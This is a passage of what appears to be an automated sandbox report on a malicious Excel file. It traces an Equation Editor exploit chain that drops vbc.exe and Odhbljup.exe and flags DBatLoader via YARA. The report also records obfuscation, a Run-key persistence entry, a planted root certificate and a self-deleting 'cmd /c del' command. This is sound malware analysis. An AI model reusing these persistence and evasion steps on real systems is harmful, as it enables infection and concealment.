Source: C:\Users\user\Odhbljup.exe Code function: 7_2_00436A08 NtdllDefWindowProc_A,GetCapture, 7_2_00436A08
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 7_2_00451770
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 7_2_00451820
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_0042BE54 NtdllDefWindowProc_A, 7_2_0042BE54
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_00450FCC NtdllDefWindowProc_A, 10_2_00450FCC
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 10_2_0044629C
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_00436A08 NtdllDefWindowProc_A,GetCapture, 10_2_00436A08
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 10_2_00451770
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 10_2_00451820
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_0042BE54 NtdllDefWindowProc_A, 10_2_0042BE54
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk, 12_2_01FC00C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC07AC NtCreateMutant,LdrInitializeThunk, 12_2_01FC07AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBF9F0 NtClose,LdrInitializeThunk, 12_2_01FBF9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBF900 NtReadFile,LdrInitializeThunk, 12_2_01FBF900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFBB8 NtQueryInformationToken,LdrInitializeThunk, 12_2_01FBFBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFB68 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_01FBFB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFB50 NtCreateKey,LdrInitializeThunk, 12_2_01FBFB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFAE8 NtQueryInformationProcess,LdrInitializeThunk, 12_2_01FBFAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_01FBFAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFAB8 NtQueryValueKey,LdrInitializeThunk, 12_2_01FBFAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFDC0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_01FBFDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFD8C NtDelayExecution,LdrInitializeThunk, 12_2_01FBFD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFC60 NtMapViewOfSection,LdrInitializeThunk, 12_2_01FBFC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFFB4 NtCreateSection,LdrInitializeThunk, 12_2_01FBFFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_01FBFED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC01D4 NtSetValueKey, 12_2_01FC01D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC1148 NtOpenThread, 12_2_01FC1148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC010C NtOpenDirectoryObject, 12_2_01FC010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC10D0 NtOpenProcessToken, 12_2_01FC10D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC0078 NtResumeThread, 12_2_01FC0078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC0060 NtQuerySection, 12_2_01FC0060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC0048 NtProtectVirtualMemory, 12_2_01FC0048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBF938 NtWriteFile, 12_2_01FBF938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC1930 NtSetContextThread, 12_2_01FC1930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBF8CC NtWaitForSingleObject, 12_2_01FBF8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFBE8 NtQueryVirtualMemory, 12_2_01FBFBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFA50 NtEnumerateValueKey, 12_2_01FBFA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFA20 NtQueryInformationFile, 12_2_01FBFA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC1D80 NtSuspendThread, 12_2_01FC1D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFD5C NtEnumerateKey, 12_2_01FBFD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFC90 NtUnmapViewOfSection, 12_2_01FBFC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFC48 NtSetInformationFile, 12_2_01FBFC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FC0C40 NtGetContextThread, 12_2_01FC0C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFC30 NtOpenProcess, 12_2_01FBFC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFFFC NtCreateProcessEx, 12_2_01FBFFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFF34 NtQueueApcThread, 12_2_01FBFF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFEA0 NtReadVirtualMemory, 12_2_01FBFEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FBFE24 NtWriteVirtualMemory, 12_2_01FBFE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_000985E0 NtCreateFile, 12_2_000985E0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00098690 NtReadFile, 12_2_00098690
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00098710 NtClose, 12_2_00098710
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_000987C0 NtAllocateVirtualMemory, 12_2_000987C0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00396A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 12_2_00396A82
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00396F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 12_2_00396F06
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00396F12 NtQueryInformationProcess, 12_2_00396F12
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$7009.xlsx
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@11/33@8/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 4_2_00423F40 GetLastError,FormatMessageA, 4_2_00423F40
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Odhbljup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Odhbljup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Odhbljup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Odhbljup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Odhbljup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Odhbljup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C8A8 FindResourceA,LoadResource,SizeofResource,LockResource, 4_2_0041C8A8
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: 7009.xlsx Virustotal: Detection: 35%
Source: 7009.xlsx ReversingLabs: Detection: 40%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e...................0.......................2.......................
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........@1........4.t...........0.......................&.......................
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE55E.tmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_00408B32 GetDiskFreeSpaceA, 4_2_00408B32
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Odhbljup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Odhbljup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Odhbljup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Odhbljup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected DBatLoader
Source: Yara match File source: 10.3.Odhbljup.exe.1d02094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.Odhbljup.exe.1d6d598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.Odhbljup.exe.1d82094.284.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.31d598.276.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.332094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.331ef4.277.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.Odhbljup.exe.1d6d594.281.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Odhbljup.exe.1ced598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.Odhbljup.exe.1d6d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.Odhbljup.exe.1d81ef4.276.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.31d620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.31d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Odhbljup.exe.1ced594.279.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Odhbljup.exe.1d01ef4.276.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Odhbljup.exe.1ced598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.331ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.Odhbljup.exe.1d6d620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Odhbljup.exe.1ced594.281.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Odhbljup.exe.1ced620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.331f44.281.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.31d594.280.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.Odhbljup.exe.1d81f44.280.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.31d734.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Odhbljup.exe.1d01f44.280.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.480010544.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.541642413.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.479622331.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.479715174.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.540973597.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.566824102.0000000001CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.478861422.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.541230145.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.566299990.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.541187560.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.541036876.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.566467574.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.541516401.0000000001D80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.478734155.0000000000334000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.478780322.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.541395274.0000000001D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.478805681.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.479654433.0000000000334000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480122394.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.565869963.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.566017629.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.566757773.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.566404823.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.541266508.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.566183618.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.566603029.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.478831765.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.541317929.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.559751606.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.540909993.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.567012932.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.566928975.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480088573.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.541124265.0000000001D80000.00000004.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043DD6C push 0043DDF9h; ret 4_2_0043DDF1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00458108 push 00458140h; ret 4_2_00458138
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A1F4 push 0042A220h; ret 4_2_0042A218
Source: C:\Users\Public\vbc.exe Code function: 4_2_004201F8 push ecx; mov dword ptr [esp], edx 4_2_004201FD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00458180 push 004581ACh; ret 4_2_004581A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A1AC push 0042A1EAh; ret 4_2_0042A1E2
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A1B4 push 0045A427h; ret 4_2_0045A41F
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A22C push 0042A264h; ret 4_2_0042A25C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C294 push 0042C2D7h; ret 4_2_0042C2CF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406340 push 00406391h; ret 4_2_00406389
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C30C push 0042C338h; ret 4_2_0042C330
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428448 push 00428518h; ret 4_2_00428510
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A550 push 0042A57Ch; ret 4_2_0042A574
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040E5F8 push 0040E624h; ret 4_2_0040E61C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406588 push 004065B4h; ret 4_2_004065AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406600 push 0040662Ch; ret 4_2_00406624
Source: C:\Users\Public\vbc.exe Code function: 4_2_00414628 push ecx; mov dword ptr [esp], eax 4_2_0041462B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428628 push 00428654h; ret 4_2_0042864C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A6FC push 0042A728h; ret 4_2_0042A720
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C6A4 push ecx; mov dword ptr [esp], edx 4_2_0041C6A6
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440764 push 00440790h; ret 4_2_00440788
Source: C:\Users\Public\vbc.exe Code function: 4_2_004547B8 push 004547F0h; ret 4_2_004547E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_004288FC push 00428928h; ret 4_2_00428920
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A958 push 0045A984h; ret 4_2_0045A97C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C918 push 0042C971h; ret 4_2_0042C969
Source: C:\Users\Public\vbc.exe Code function: 4_2_004289F8 push 00428A24h; ret 4_2_00428A1C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C9FF pushfd ; retf 0041h 4_2_0041CA51
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A990 push 0045A9B6h; ret 4_2_0045A9AE
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C9B4 push 0042C9ECh; ret 4_2_0042C9E4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042CA48 push 0042CA74h; ret 4_2_0042CA6C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043EA9C push ecx; mov dword ptr [esp], edx 4_2_0043EAA0
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00459820 LoadLibraryA,GetProcAddress, 4_2_00459820

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\Odhbljup.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\Odhbljup.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\Odhbljup.exe
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Odhbljup

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 4_2_00451054
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 4_2_0044E03C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043812C IsIconic,GetCapture, 4_2_0043812C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 4_2_004389E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect, 4_2_00428C3C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 4_2_00439260
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_00451770
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_00451820
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 7_2_00451054
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 7_2_0044E03C
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_0043812C IsIconic,GetCapture, 7_2_0043812C
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 7_2_004389E0
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect, 7_2_00428C3C
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 7_2_00439260
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 7_2_00451770
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 7_2_00451820
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 10_2_00451054
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 10_2_0044E03C
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_0043812C IsIconic,GetCapture, 10_2_0043812C
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 10_2_004389E0
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect, 10_2_00428C3C
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 10_2_00439260
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 10_2_00451770
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 10_2_00451820
Stores large binary data to the registry
Source: C:\Users\Public\vbc.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Extensive use of GetProcAddress (often used to hide API calls)
